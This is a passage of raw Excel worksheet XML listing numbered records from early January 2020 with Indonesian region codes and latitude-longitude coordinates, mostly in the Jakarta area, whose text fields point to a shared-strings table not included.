    </row>
    <row r="275" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A275">
        <v>101866</v>
      </c>
      <c r="B275" s="1">
        <v>43835</v>
      </c>
      <c r="C275" s="2">
        <v>0.9984143518518519</v>
      </c>
      <c r="D275" t="s">
        <v>22</v>
      </c>
      <c r="E275" t="s">
        <v>23</v>
      </c>
      <c r="F275" t="s">
        <v>1288</v>
      </c>
      <c r="G275" t="s">
        <v>1289</v>
      </c>
      <c r="H275" t="s">
        <v>26</v>
      </c>
      <c r="I275" t="s">
        <v>166</v>
      </c>
      <c r="J275" t="s">
        <v>478</v>
      </c>
      <c r="L275" t="s">
        <v>1290</v>
      </c>
      <c r="M275">
        <v>3174070001</v>
      </c>
      <c r="N275">
        <v>3174070</v>
      </c>
      <c r="O275">
        <v>3174</v>
      </c>
      <c r="P275">
        <v>31</v>
      </c>
      <c r="Q275" t="s">
        <v>83</v>
      </c>
      <c r="R275" t="s">
        <v>84</v>
      </c>
      <c r="S275" t="s">
        <v>32</v>
      </c>
      <c r="T275" t="s">
        <v>33</v>
      </c>
      <c r="U275" s="5">
        <v>10671660</v>
      </c>
      <c r="V275" s="5" t="s">
        <v>14711</v>
      </c>
      <c r="W275" s="5">
        <v>-616405</v>
      </c>
      <c r="X275" t="s">
        <v>18521</v>
      </c>
      <c r="Y275" t="str">
        <f t="shared" si="4"/>
        <v>-6.16405,106.71660</v>
      </c>
    </row>
    <row r="276" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A276">
        <v>101867</v>
      </c>
      <c r="B276" s="1">
        <v>43836</v>
      </c>
      <c r="C276" s="2">
        <v>1.4560185185185183E-2</v>
      </c>
      <c r="D276" t="s">
        <v>22</v>
      </c>
      <c r="E276" t="s">
        <v>23</v>
      </c>
      <c r="F276" t="s">
        <v>1291</v>
      </c>
      <c r="G276" t="s">
        <v>1292</v>
      </c>
      <c r="H276" t="s">
        <v>26</v>
      </c>
      <c r="I276" t="s">
        <v>831</v>
      </c>
      <c r="J276" t="s">
        <v>1293</v>
      </c>
      <c r="M276">
        <v>3171030002</v>
      </c>
      <c r="N276">
        <v>3171030</v>
      </c>
      <c r="O276">
        <v>3171</v>
      </c>
      <c r="P276">
        <v>31</v>
      </c>
      <c r="Q276" t="s">
        <v>1294</v>
      </c>
      <c r="R276" t="s">
        <v>364</v>
      </c>
      <c r="S276" t="s">
        <v>108</v>
      </c>
      <c r="T276" t="s">
        <v>33</v>
      </c>
      <c r="U276" s="5">
        <v>10680848</v>
      </c>
      <c r="V276" s="5" t="s">
        <v>14712</v>
      </c>
      <c r="W276" s="5">
        <v>-631413</v>
      </c>
      <c r="X276" t="s">
        <v>18522</v>
      </c>
      <c r="Y276" t="str">
        <f t="shared" si="4"/>
        <v>-6.31413,106.80848</v>
      </c>
    </row>
    <row r="277" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A277">
        <v>101869</v>
      </c>
      <c r="B277" s="1">
        <v>43836</v>
      </c>
      <c r="C277" s="2">
        <v>0.13983796296296297</v>
      </c>
      <c r="D277" t="s">
        <v>85</v>
      </c>
      <c r="E277" t="s">
        <v>23</v>
      </c>
      <c r="F277" t="s">
        <v>1295</v>
      </c>
      <c r="G277" t="s">
        <v>1296</v>
      </c>
      <c r="H277" t="s">
        <v>26</v>
      </c>
      <c r="J277" t="s">
        <v>1297</v>
      </c>
      <c r="K277" t="s">
        <v>1298</v>
      </c>
      <c r="L277" t="s">
        <v>1299</v>
      </c>
      <c r="M277">
        <v>3171090005</v>
      </c>
      <c r="N277">
        <v>3171090</v>
      </c>
      <c r="O277">
        <v>3171</v>
      </c>
      <c r="P277">
        <v>31</v>
      </c>
      <c r="Q277" t="s">
        <v>1300</v>
      </c>
      <c r="R277" t="s">
        <v>347</v>
      </c>
      <c r="S277" t="s">
        <v>108</v>
      </c>
      <c r="T277" t="s">
        <v>33</v>
      </c>
      <c r="U277" s="5">
        <v>10685944</v>
      </c>
      <c r="V277" s="5" t="s">
        <v>14713</v>
      </c>
      <c r="W277" s="5">
        <v>-621758</v>
      </c>
      <c r="X277" t="s">
        <v>18523</v>
      </c>
      <c r="Y277" t="str">
        <f t="shared" si="4"/>
        <v>-6.21758,106.85944</v>
      </c>
    </row>
    <row r="278" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A278">
        <v>101870</v>
      </c>
      <c r="B278" s="1">
        <v>43836</v>
      </c>
      <c r="C278" s="2">
        <v>0.24265046296296297</v>
      </c>
      <c r="D278" t="s">
        <v>22</v>
      </c>
      <c r="E278" t="s">
        <v>23</v>
      </c>
      <c r="F278" t="s">
        <v>1301</v>
      </c>
      <c r="H278" t="s">
        <v>26</v>
      </c>
      <c r="I278" t="s">
        <v>1194</v>
      </c>
      <c r="J278" t="s">
        <v>586</v>
      </c>
      <c r="L278" t="s">
        <v>1302</v>
      </c>
      <c r="M278">
        <v>3173050002</v>
      </c>
      <c r="N278">
        <v>3173050</v>
      </c>
      <c r="O278">
        <v>3173</v>
      </c>
      <c r="P278">
        <v>31</v>
      </c>
      <c r="Q278" t="s">
        <v>588</v>
      </c>
      <c r="R278" t="s">
        <v>589</v>
      </c>
      <c r="S278" t="s">
        <v>62</v>
      </c>
      <c r="T278" t="s">
        <v>33</v>
      </c>
      <c r="U278" s="5">
        <v>10686539</v>
      </c>
      <c r="V278" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W278" s="5">
        <v>-617605</v>
      </c>
      <c r="X278" t="s">
        <v>18379</v>
      </c>
      <c r="Y278" t="str">
        <f t="shared" si="4"/>
        <v>-6.17605,106.86539</v>
      </c>
    </row>
    <row r="279" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A279">
        <v>101871</v>
      </c>
      <c r="B279" s="1">
        <v>43836</v>
      </c>
      <c r="C279" s="2">
        <v>0.39122685185185185</v>
      </c>
      <c r="D279" t="s">
        <v>22</v>
      </c>
      <c r="E279" t="s">
        <v>23</v>
      </c>
      <c r="F279" t="s">
        <v>1303</v>
      </c>
      <c r="H279" t="s">
        <v>26</v>
      </c>
      <c r="I279" t="s">
        <v>784</v>
      </c>
      <c r="J279" t="s">
        <v>1128</v>
      </c>
      <c r="L279" t="s">
        <v>1304</v>
      </c>
      <c r="M279">
        <v>6471010004</v>
      </c>
      <c r="N279">
        <v>6471010</v>
      </c>
      <c r="O279">
        <v>6471</v>
      </c>
      <c r="P279">
        <v>64</v>
      </c>
      <c r="Q279" t="s">
        <v>1305</v>
      </c>
      <c r="R279" t="s">
        <v>1306</v>
      </c>
      <c r="S279" t="s">
        <v>1307</v>
      </c>
      <c r="T279" t="s">
        <v>1308</v>
      </c>
      <c r="U279" s="5">
        <v>11684089</v>
      </c>
      <c r="V279" s="5" t="s">
        <v>14714</v>
      </c>
      <c r="W279" s="5">
        <v>-127847</v>
      </c>
      <c r="X279" t="s">
        <v>18524</v>
      </c>
      <c r="Y279" t="str">
        <f t="shared" si="4"/>
        <v>-1.27847,116.84089</v>
      </c>
    </row>
    <row r="280" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A280">
        <v>101872</v>
      </c>
      <c r="B280" s="1">
        <v>43836</v>
      </c>
      <c r="C280" s="2">
        <v>0.51945601851851853</v>
      </c>
      <c r="D280" t="s">
        <v>22</v>
      </c>
      <c r="E280" t="s">
        <v>23</v>
      </c>
      <c r="F280" t="s">
        <v>1309</v>
      </c>
      <c r="H280" t="s">
        <v>26</v>
      </c>
      <c r="I280" t="s">
        <v>1310</v>
      </c>
      <c r="J280" t="s">
        <v>1311</v>
      </c>
      <c r="L280" t="s">
        <v>1312</v>
      </c>
      <c r="M280">
        <v>3171060006</v>
      </c>
      <c r="N280">
        <v>3171060</v>
      </c>
      <c r="O280">
        <v>3171</v>
      </c>
      <c r="P280">
        <v>31</v>
      </c>
      <c r="Q280" t="s">
        <v>1313</v>
      </c>
      <c r="R280" t="s">
        <v>1236</v>
      </c>
      <c r="S280" t="s">
        <v>108</v>
      </c>
      <c r="T280" t="s">
        <v>33</v>
      </c>
      <c r="U280" s="5">
        <v>10678770</v>
      </c>
      <c r="V280" s="5" t="s">
        <v>14715</v>
      </c>
      <c r="W280" s="5">
        <v>-624144</v>
      </c>
      <c r="X280" t="s">
        <v>18525</v>
      </c>
      <c r="Y280" t="str">
        <f t="shared" si="4"/>
        <v>-6.24144,106.78770</v>
      </c>
    </row>
    <row r="281" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A281">
        <v>101873</v>
      </c>
      <c r="B281" s="1">
        <v>43836</v>
      </c>
      <c r="C281" s="2">
        <v>0.5390625</v>
      </c>
      <c r="D281" t="s">
        <v>22</v>
      </c>
      <c r="E281" t="s">
        <v>23</v>
      </c>
      <c r="F281" t="s">
        <v>1314</v>
      </c>
      <c r="G281" t="s">
        <v>1315</v>
      </c>
      <c r="H281" t="s">
        <v>26</v>
      </c>
      <c r="I281" t="s">
        <v>1316</v>
      </c>
      <c r="J281" t="s">
        <v>675</v>
      </c>
      <c r="L281" t="s">
        <v>1317</v>
      </c>
      <c r="M281">
        <v>3174010006</v>
      </c>
      <c r="N281">
        <v>3174010</v>
      </c>
      <c r="O281">
        <v>3174</v>
      </c>
      <c r="P281">
        <v>31</v>
      </c>
      <c r="Q281" t="s">
        <v>268</v>
      </c>
      <c r="R281" t="s">
        <v>69</v>
      </c>
      <c r="S281" t="s">
        <v>32</v>
      </c>
      <c r="T281" t="s">
        <v>33</v>
      </c>
      <c r="U281" s="5">
        <v>10673393</v>
      </c>
      <c r="V281" s="5" t="s">
        <v>14716</v>
      </c>
      <c r="W281" s="5">
        <v>-617552</v>
      </c>
      <c r="X281" t="s">
        <v>18526</v>
      </c>
      <c r="Y281" t="str">
        <f t="shared" si="4"/>
        <v>-6.17552,106.73393</v>
      </c>
    </row>
    <row r="282" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A282">
        <v>101874</v>
      </c>
      <c r="B282" s="1">
        <v>43836</v>
      </c>
      <c r="C282" s="2">
        <v>0.59225694444444443</v>
      </c>
      <c r="D282" t="s">
        <v>22</v>
      </c>
      <c r="E282" t="s">
        <v>23</v>
      </c>
      <c r="F282" t="s">
        <v>1318</v>
      </c>
      <c r="G282" t="s">
        <v>1319</v>
      </c>
      <c r="H282" t="s">
        <v>26</v>
      </c>
      <c r="I282" t="s">
        <v>1009</v>
      </c>
      <c r="J282" t="s">
        <v>1320</v>
      </c>
      <c r="L282" t="s">
        <v>1321</v>
      </c>
      <c r="M282">
        <v>3175050002</v>
      </c>
      <c r="N282">
        <v>3175050</v>
      </c>
      <c r="O282">
        <v>3175</v>
      </c>
      <c r="P282">
        <v>31</v>
      </c>
      <c r="Q282" t="s">
        <v>1012</v>
      </c>
      <c r="R282" t="s">
        <v>1013</v>
      </c>
      <c r="S282" t="s">
        <v>547</v>
      </c>
      <c r="T282" t="s">
        <v>33</v>
      </c>
      <c r="U282" s="5">
        <v>10690370</v>
      </c>
      <c r="V282" s="5" t="s">
        <v>14717</v>
      </c>
      <c r="W282" s="5">
        <v>-617803</v>
      </c>
      <c r="X282" t="s">
        <v>18527</v>
      </c>
      <c r="Y282" t="str">
        <f t="shared" si="4"/>
        <v>-6.17803,106.90370</v>
      </c>
    </row>
    <row r="283" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A283">
        <v>101875</v>
      </c>
      <c r="B283" s="1">
        <v>43836</v>
      </c>
      <c r="C283" s="2">
        <v>0.66487268518518516</v>
      </c>
      <c r="D283" t="s">
        <v>22</v>
      </c>
      <c r="E283" t="s">
        <v>23</v>
      </c>
      <c r="F283" t="s">
        <v>1322</v>
      </c>
      <c r="G283" t="s">
        <v>1323</v>
      </c>
      <c r="H283" t="s">
        <v>26</v>
      </c>
      <c r="I283" t="s">
        <v>628</v>
      </c>
      <c r="J283" t="s">
        <v>266</v>
      </c>
      <c r="L283" t="s">
        <v>1324</v>
      </c>
      <c r="M283">
        <v>3174010006</v>
      </c>
      <c r="N283">
        <v>3174010</v>
      </c>
      <c r="O283">
        <v>3174</v>
      </c>
      <c r="P283">
        <v>31</v>
      </c>
      <c r="Q283" t="s">
        <v>268</v>
      </c>
      <c r="R283" t="s">
        <v>69</v>
      </c>
      <c r="S283" t="s">
        <v>32</v>
      </c>
      <c r="T283" t="s">
        <v>33</v>
      </c>
      <c r="U283" s="5">
        <v>10673892</v>
      </c>
      <c r="V283" s="5" t="s">
        <v>14718</v>
      </c>
      <c r="W283" s="5">
        <v>-617429</v>
      </c>
      <c r="X283" t="s">
        <v>18528</v>
      </c>
      <c r="Y283" t="str">
        <f t="shared" si="4"/>
        <v>-6.17429,106.73892</v>
      </c>
    </row>
    <row r="284" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A284">
        <v>101876</v>
      </c>
      <c r="B284" s="1">
        <v>43836</v>
      </c>
      <c r="C284" s="2">
        <v>0.99204861111111109</v>
      </c>
      <c r="D284" t="s">
        <v>85</v>
      </c>
      <c r="E284" t="s">
        <v>23</v>
      </c>
      <c r="F284" t="s">
        <v>1325</v>
      </c>
      <c r="G284" t="s">
        <v>1326</v>
      </c>
      <c r="H284" t="s">
        <v>26</v>
      </c>
      <c r="J284" t="s">
        <v>306</v>
      </c>
      <c r="K284" t="s">
        <v>1327</v>
      </c>
      <c r="L284" t="s">
        <v>1328</v>
      </c>
      <c r="M284">
        <v>3172060001</v>
      </c>
      <c r="N284">
        <v>3172060</v>
      </c>
      <c r="O284">
        <v>3172</v>
      </c>
      <c r="P284">
        <v>31</v>
      </c>
      <c r="Q284" t="s">
        <v>309</v>
      </c>
      <c r="R284" t="s">
        <v>48</v>
      </c>
      <c r="S284" t="s">
        <v>49</v>
      </c>
      <c r="T284" t="s">
        <v>33</v>
      </c>
      <c r="U284" s="5">
        <v>10686719</v>
      </c>
      <c r="V284" s="5" t="s">
        <v>14719</v>
      </c>
      <c r="W284" s="5">
        <v>-623843</v>
      </c>
      <c r="X284" t="s">
        <v>18470</v>
      </c>
      <c r="Y284" t="str">
        <f t="shared" si="4"/>
        <v>-6.23843,106.86719</v>
      </c>
    </row>
    <row r="285" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A285">
        <v>101877</v>
      </c>
      <c r="B285" s="1">
        <v>43837</v>
      </c>
      <c r="C285" s="2">
        <v>0.11723379629629631</v>
      </c>
      <c r="D285" t="s">
        <v>22</v>
      </c>
      <c r="E285" t="s">
        <v>23</v>
      </c>
      <c r="F285" t="s">
        <v>1329</v>
      </c>
      <c r="H285" t="s">
        <v>26</v>
      </c>
      <c r="I285" t="s">
        <v>1263</v>
      </c>
      <c r="J285" t="s">
        <v>1330</v>
      </c>
      <c r="L285" t="s">
        <v>1331</v>
      </c>
      <c r="M285">
        <v>3374070005</v>
      </c>
      <c r="N285">
        <v>3374070</v>
      </c>
      <c r="O285">
        <v>3374</v>
      </c>
      <c r="P285">
        <v>33</v>
      </c>
      <c r="Q285" t="s">
        <v>1332</v>
      </c>
      <c r="R285" t="s">
        <v>1333</v>
      </c>
      <c r="S285" t="s">
        <v>1334</v>
      </c>
      <c r="T285" t="s">
        <v>1134</v>
      </c>
      <c r="U285" s="5">
        <v>11044519</v>
      </c>
      <c r="V285" s="5" t="s">
        <v>14720</v>
      </c>
      <c r="W285" s="5">
        <v>-705685</v>
      </c>
      <c r="X285" t="s">
        <v>18529</v>
      </c>
      <c r="Y285" t="str">
        <f t="shared" si="4"/>
        <v>-7.05685,110.44519</v>
      </c>
    </row>
    <row r="286" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A286">
        <v>101878</v>
      </c>
      <c r="B286" s="1">
        <v>43837</v>
      </c>
      <c r="C286" s="2">
        <v>0.22822916666666668</v>
      </c>
      <c r="D286" t="s">
        <v>22</v>
      </c>
      <c r="E286" t="s">
        <v>23</v>
      </c>
      <c r="F286" t="s">
        <v>1335</v>
      </c>
      <c r="G286" t="s">
        <v>1336</v>
      </c>
      <c r="H286" t="s">
        <v>26</v>
      </c>
      <c r="I286" t="s">
        <v>193</v>
      </c>
      <c r="J286" t="s">
        <v>563</v>
      </c>
      <c r="L286" t="s">
        <v>1337</v>
      </c>
      <c r="M286">
        <v>3174010005</v>
      </c>
      <c r="N286">
        <v>3174010</v>
      </c>
      <c r="O286">
        <v>3174</v>
      </c>
      <c r="P286">
        <v>31</v>
      </c>
      <c r="Q286" t="s">
        <v>251</v>
      </c>
      <c r="R286" t="s">
        <v>69</v>
      </c>
      <c r="S286" t="s">
        <v>32</v>
      </c>
      <c r="T286" t="s">
        <v>33</v>
      </c>
      <c r="U286" s="5">
        <v>10675585</v>
      </c>
      <c r="V286" s="5" t="s">
        <v>14721</v>
      </c>
      <c r="W286" s="5">
        <v>-618632</v>
      </c>
      <c r="X286" t="s">
        <v>18530</v>
      </c>
      <c r="Y286" t="str">
        <f t="shared" si="4"/>
        <v>-6.18632,106.75585</v>
      </c>
    </row>
    <row r="287" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A287">
        <v>101879</v>
      </c>
      <c r="B287" s="1">
        <v>43837</v>
      </c>
      <c r="C287" s="2">
        <v>0.28542824074074075</v>
      </c>
      <c r="D287" t="s">
        <v>22</v>
      </c>
      <c r="E287" t="s">
        <v>23</v>
      </c>
      <c r="F287" t="s">
        <v>1338</v>
      </c>
      <c r="G287" t="s">
        <v>1339</v>
      </c>
      <c r="H287" t="s">
        <v>26</v>
      </c>
      <c r="I287" t="s">
        <v>1340</v>
      </c>
      <c r="J287" t="s">
        <v>586</v>
      </c>
      <c r="M287">
        <v>3173050002</v>
      </c>
      <c r="N287">
        <v>3173050</v>
      </c>
      <c r="O287">
        <v>3173</v>
      </c>
      <c r="P287">
        <v>31</v>
      </c>
      <c r="Q287" t="s">
        <v>588</v>
      </c>
      <c r="R287" t="s">
        <v>589</v>
      </c>
      <c r="S287" t="s">
        <v>62</v>
      </c>
      <c r="T287" t="s">
        <v>33</v>
      </c>
      <c r="U287" s="5">
        <v>10686539</v>
      </c>
      <c r="V287" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W287" s="5">
        <v>-617469</v>
      </c>
      <c r="X287" t="s">
        <v>18368</v>
      </c>
      <c r="Y287" t="str">
        <f t="shared" si="4"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="288" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A288">
        <v>101880</v>
      </c>
      <c r="B288" s="1">
        <v>43837</v>
      </c>
      <c r="C288" s="2">
        <v>0.32462962962962966</v>
      </c>
      <c r="D288" t="s">
        <v>22</v>
      </c>
      <c r="E288" t="s">
        <v>23</v>
      </c>
      <c r="F288" t="s">
        <v>1341</v>
      </c>
      <c r="H288" t="s">
        <v>26</v>
      </c>
      <c r="I288" t="s">
        <v>867</v>
      </c>
      <c r="J288" t="s">
        <v>1342</v>
      </c>
      <c r="L288" t="s">
        <v>1343</v>
      </c>
      <c r="M288">
        <v>3578190001</v>
      </c>
      <c r="N288">
        <v>3578190</v>
      </c>
      <c r="O288">
        <v>3578</v>
      </c>
      <c r="P288">
        <v>35</v>
      </c>
      <c r="Q288" t="s">
        <v>1344</v>
      </c>
      <c r="R288" t="s">
        <v>1345</v>
      </c>
      <c r="S288" t="s">
        <v>1346</v>
      </c>
      <c r="T288" t="s">
        <v>1221</v>
      </c>
      <c r="U288" s="5">
        <v>11274170</v>
      </c>
      <c r="V288" s="5" t="s">
        <v>14722</v>
      </c>
      <c r="W288" s="5">
        <v>-727240</v>
      </c>
      <c r="X288" t="s">
        <v>18531</v>
      </c>
      <c r="Y288" t="str">
        <f t="shared" si="4"/>
        <v>-7.27240,112.74170</v>
      </c>
    </row>
    <row r="289" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A289">
        <v>101881</v>
      </c>
      <c r="B289" s="1">
        <v>43837</v>
      </c>
      <c r="C289" s="2">
        <v>0.40540509259259255</v>
      </c>
      <c r="D289" t="s">
        <v>22</v>
      </c>
      <c r="E289" t="s">
        <v>23</v>
      </c>
      <c r="F289" t="s">
        <v>1347</v>
      </c>
      <c r="H289" t="s">
        <v>26</v>
      </c>
      <c r="I289" t="s">
        <v>1348</v>
      </c>
      <c r="J289" t="s">
        <v>1349</v>
      </c>
      <c r="L289" t="s">
        <v>1350</v>
      </c>
      <c r="M289">
        <v>3172040005</v>
      </c>
      <c r="N289">
        <v>3172040</v>
      </c>
      <c r="O289">
        <v>3172</v>
      </c>
      <c r="P289">
        <v>31</v>
      </c>
      <c r="Q289" t="s">
        <v>1351</v>
      </c>
      <c r="R289" t="s">
        <v>281</v>
      </c>
      <c r="S289" t="s">
        <v>49</v>
      </c>
      <c r="T289" t="s">
        <v>33</v>
      </c>
      <c r="U289" s="5">
        <v>10691648</v>
      </c>
      <c r="V289" s="5" t="s">
        <v>14723</v>
      </c>
      <c r="W289" s="5">
        <v>-625424</v>
      </c>
      <c r="X289" t="s">
        <v>18532</v>
      </c>
      <c r="Y289" t="str">
        <f t="shared" si="4"/>
        <v>-6.25424,106.91648</v>
      </c>
    </row>
    <row r="290" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A290">
        <v>101882</v>
      </c>
      <c r="B290" s="1">
        <v>43837</v>
      </c>
      <c r="C290" s="2">
        <v>0.52973379629629636</v>
      </c>
      <c r="D290" t="s">
        <v>22</v>
      </c>
      <c r="E290" t="s">
        <v>23</v>
      </c>
      <c r="F290" t="s">
        <v>1352</v>
      </c>
      <c r="G290" t="s">
        <v>1353</v>
      </c>
      <c r="H290" t="s">
        <v>26</v>
      </c>
      <c r="I290" t="s">
        <v>1354</v>
      </c>
      <c r="J290" t="s">
        <v>1355</v>
      </c>
      <c r="L290" t="s">
        <v>1356</v>
      </c>
      <c r="M290">
        <v>3174070002</v>
      </c>
      <c r="N290">
        <v>3174070</v>
      </c>
      <c r="O290">
        <v>3174</v>
      </c>
      <c r="P290">
        <v>31</v>
      </c>
      <c r="Q290" t="s">
        <v>621</v>
      </c>
      <c r="R290" t="s">
        <v>84</v>
      </c>
      <c r="S290" t="s">
        <v>32</v>
      </c>
      <c r="T290" t="s">
        <v>33</v>
      </c>
      <c r="U290" s="5">
        <v>10674618</v>
      </c>
      <c r="V290" s="5" t="s">
        <v>14724</v>
      </c>
      <c r="W290" s="5">
        <v>-616059</v>
      </c>
      <c r="X290" t="s">
        <v>18533</v>
      </c>
      <c r="Y290" t="str">
        <f t="shared" si="4"/>
        <v>-6.16059,106.74618</v>
      </c>
    </row>
    <row r="291" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A291">
        <v>101883</v>
      </c>
      <c r="B291" s="1">
        <v>43837</v>
      </c>
      <c r="C291" s="2">
        <v>0.61576388888888889</v>
      </c>
      <c r="D291" t="s">
        <v>22</v>
      </c>
      <c r="E291" t="s">
        <v>23</v>
      </c>
      <c r="F291" t="s">
        <v>1357</v>
      </c>
      <c r="G291" t="s">
        <v>1358</v>
      </c>
      <c r="H291" t="s">
        <v>26</v>
      </c>
      <c r="I291" t="s">
        <v>1359</v>
      </c>
      <c r="J291" t="s">
        <v>1360</v>
      </c>
      <c r="M291">
        <v>3374090013</v>
      </c>
      <c r="N291">
        <v>3374090</v>
      </c>
      <c r="O291">
        <v>3374</v>
      </c>
      <c r="P291">
        <v>33</v>
      </c>
      <c r="Q291" t="s">
        <v>1361</v>
      </c>
      <c r="R291" t="s">
        <v>1362</v>
      </c>
      <c r="S291" t="s">
        <v>1334</v>
      </c>
      <c r="T291" t="s">
        <v>1134</v>
      </c>
      <c r="U291" s="5">
        <v>11045876</v>
      </c>
      <c r="V291" s="5" t="s">
        <v>14725</v>
      </c>
      <c r="W291" s="5">
        <v>-695509</v>
      </c>
      <c r="X291" t="s">
        <v>18534</v>
      </c>
      <c r="Y291" t="str">
        <f t="shared" si="4"/>
        <v>-6.95509,110.45876</v>
      </c>
    </row>
    <row r="292" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A292">
        <v>101884</v>
      </c>
      <c r="B292" s="1">
        <v>43837</v>
      </c>
      <c r="C292" s="2">
        <v>0.82358796296296299</v>
      </c>
      <c r="D292" t="s">
        <v>22</v>
      </c>
      <c r="E292" t="s">
        <v>23</v>
      </c>
      <c r="F292" t="s">
        <v>1363</v>
      </c>
      <c r="H292" t="s">
        <v>26</v>
      </c>
      <c r="I292" t="s">
        <v>1364</v>
      </c>
      <c r="J292" t="s">
        <v>1342</v>
      </c>
      <c r="L292" t="s">
        <v>1365</v>
      </c>
      <c r="M292">
        <v>3525060009</v>
      </c>
      <c r="N292">
        <v>3525060</v>
      </c>
      <c r="O292">
        <v>3525</v>
      </c>
      <c r="P292">
        <v>35</v>
      </c>
      <c r="Q292" t="s">
        <v>1366</v>
      </c>
      <c r="R292" t="s">
        <v>1367</v>
      </c>
      <c r="S292" t="s">
        <v>1368</v>
      </c>
      <c r="T292" t="s">
        <v>1221</v>
      </c>
      <c r="U292" s="5">
        <v>11249107</v>
      </c>
      <c r="V292" s="5" t="s">
        <v>14726</v>
      </c>
      <c r="W292" s="5">
        <v>-726759</v>
      </c>
      <c r="X292" t="s">
        <v>18535</v>
      </c>
      <c r="Y292" t="str">
        <f t="shared" si="4"/>
        <v>-7.26759,112.49107</v>
      </c>
    </row>
    <row r="293" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A293">
        <v>101885</v>
      </c>
      <c r="B293" s="1">
        <v>43837</v>
      </c>
      <c r="C293" s="2">
        <v>0.98723379629629626</v>
      </c>
      <c r="D293" t="s">
        <v>85</v>
      </c>
      <c r="E293" t="s">
        <v>23</v>
      </c>
      <c r="F293" t="s">
        <v>1369</v>
      </c>
      <c r="G293" t="s">
        <v>1370</v>
      </c>
      <c r="H293" t="s">
        <v>26</v>
      </c>
      <c r="J293" t="s">
        <v>1371</v>
      </c>
      <c r="K293" t="s">
        <v>1372</v>
      </c>
      <c r="L293" t="s">
        <v>1373</v>
      </c>
      <c r="M293">
        <v>3172060001</v>
      </c>
      <c r="N293">
        <v>3172060</v>
      </c>
      <c r="O293">
        <v>3172</v>
      </c>
      <c r="P293">
        <v>31</v>
      </c>
      <c r="Q293" t="s">
        <v>309</v>
      </c>
      <c r="R293" t="s">
        <v>48</v>
      </c>
      <c r="S293" t="s">
        <v>49</v>
      </c>
      <c r="T293" t="s">
        <v>33</v>
      </c>
      <c r="U293" s="5">
        <v>10686687</v>
      </c>
      <c r="V293" s="5" t="s">
        <v>14727</v>
      </c>
      <c r="W293" s="5">
        <v>-623397</v>
      </c>
      <c r="X293" t="s">
        <v>18536</v>
      </c>
      <c r="Y293" t="str">
        <f t="shared" si="4"/>
        <v>-6.23397,106.86687</v>
      </c>
    </row>
    <row r="294" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A294">
        <v>101886</v>
      </c>
      <c r="B294" s="1">
        <v>43838</v>
      </c>
      <c r="C294" s="2">
        <v>8.2210648148148144E-2</v>
      </c>
      <c r="D294" t="s">
        <v>22</v>
      </c>
      <c r="E294" t="s">
        <v>23</v>
      </c>
      <c r="F294" t="s">
        <v>1374</v>
      </c>
      <c r="G294" t="s">
        <v>1375</v>
      </c>
      <c r="H294" t="s">
        <v>26</v>
      </c>
      <c r="I294" t="s">
        <v>1376</v>
      </c>
      <c r="J294" t="s">
        <v>37</v>
      </c>
      <c r="L294" t="s">
        <v>1377</v>
      </c>
      <c r="M294">
        <v>3275041003</v>
      </c>
      <c r="N294">
        <v>3275041</v>
      </c>
      <c r="O294">
        <v>3275</v>
      </c>
      <c r="P294">
        <v>32</v>
      </c>
      <c r="Q294" t="s">
        <v>432</v>
      </c>
      <c r="R294" t="s">
        <v>134</v>
      </c>
      <c r="S294" t="s">
        <v>41</v>
      </c>
      <c r="T294" t="s">
        <v>42</v>
      </c>
      <c r="U294" s="5">
        <v>10699936</v>
      </c>
      <c r="V294" s="5" t="s">
        <v>14728</v>
      </c>
      <c r="W294" s="5">
        <v>-627153</v>
      </c>
      <c r="X294" t="s">
        <v>18537</v>
      </c>
      <c r="Y294" t="str">
        <f t="shared" si="4"/>
        <v>-6.27153,106.99936</v>
      </c>
    </row>
    <row r="295" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A295">
        <v>101887</v>
      </c>
      <c r="B295" s="1">
        <v>43838</v>
      </c>
      <c r="C295" s="2">
        <v>0.30351851851851852</v>
      </c>
      <c r="D295" t="s">
        <v>22</v>
      </c>
      <c r="E295" t="s">
        <v>23</v>
      </c>
      <c r="F295" t="s">
        <v>1378</v>
      </c>
      <c r="H295" t="s">
        <v>26</v>
      </c>
      <c r="I295" t="s">
        <v>1379</v>
      </c>
      <c r="J295" t="s">
        <v>1380</v>
      </c>
      <c r="L295" t="s">
        <v>1381</v>
      </c>
      <c r="M295">
        <v>3174070002</v>
      </c>
      <c r="N295">
        <v>3174070</v>
      </c>
      <c r="O295">
        <v>3174</v>
      </c>
      <c r="P295">
        <v>31</v>
      </c>
      <c r="Q295" t="s">
        <v>621</v>
      </c>
      <c r="R295" t="s">
        <v>84</v>
      </c>
      <c r="S295" t="s">
        <v>32</v>
      </c>
      <c r="T295" t="s">
        <v>33</v>
      </c>
      <c r="U295" s="5">
        <v>10674167</v>
      </c>
      <c r="V295" s="5" t="s">
        <v>14729</v>
      </c>
      <c r="W295" s="5">
        <v>-615592</v>
      </c>
      <c r="X295" t="s">
        <v>18538</v>
      </c>
      <c r="Y295" t="str">
        <f t="shared" si="4"/>
        <v>-6.15592,106.74167</v>
      </c>
    </row>
    <row r="296" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A296">
        <v>101888</v>
      </c>
      <c r="B296" s="1">
        <v>43838</v>
      </c>
      <c r="C296" s="2">
        <v>0.50930555555555557</v>
      </c>
      <c r="D296" t="s">
        <v>22</v>
      </c>
      <c r="E296" t="s">
        <v>23</v>
      </c>
      <c r="F296" t="s">
